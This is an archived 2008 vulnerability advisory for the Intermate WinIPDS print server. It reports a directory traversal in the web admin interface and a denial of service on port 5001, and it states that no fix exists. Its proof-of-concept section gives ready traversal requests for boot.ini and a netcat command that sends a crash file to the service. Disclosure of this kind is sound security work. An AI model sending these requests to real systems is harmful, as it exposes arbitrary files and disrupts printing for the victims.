intermate-traverse.txt

2008-02-12T00:00:00
ID PACKETSTORM:63550
Type packetstorm
Reporter Luigi Auriemma
Modified 2008-02-12T00:00:00

Description

                                        
                                            `  
#######################################################################  
  
Luigi Auriemma  
  
Application: Intermate WinIPDS  
http://www.intermate.com/ipdssoftware  
Versions: <= Release 3.3 Revision G52-33-021  
Platforms: Windows  
Bugs: A] directory traversal in web administration  
B] Denial of Service versus the IPDS port  
Exploitation: remote  
Date: 12 Feb 2008  
Author: Luigi Auriemma  
e-mail: aluigi@autistici.org  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bugs  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
WinIPDS is a commercial AFP (Advanced function printing) and IPDS  
(Intelligent Printer Data Stream) print server for Windows.  
  
  
#######################################################################  
  
=======  
2) Bugs  
=======  
  
--------------------------------------------  
A] directory traversal in web administration  
--------------------------------------------  
  
WinIPDS includes a web server for the remote administration of the  
service.  
This web interface is vulnerable to a classical directory traversal  
attack exploitable with both the plain slash and backslash delimiters  
allowing an attacker to download any file from the disk on which is  
installed the program.  
  
  
-----------------------------------------  
B] Denial of Service versus the IPDS port  
-----------------------------------------  
  
5001 is the port used by the IPDS service for the remote printing of  
the files.  
The problem here is that packets smaller than the size they should have  
cause CPU at 100% and the inability to handle the printing commands of  
the users.  
The packet's types which cause this effect are 3, 5, 7, 13, 14 and 15.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
A]  
GET /../../../../../boot.ini HTTP/1.0  
or  
POST /..\../..\../..\boot.ini HTTP/1.0  
  
B]  
http://aluigi.org/poc/winipds.txt  
  
nc SERVER 5001 -v -v -w 3 < winipds.txt  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.org  
`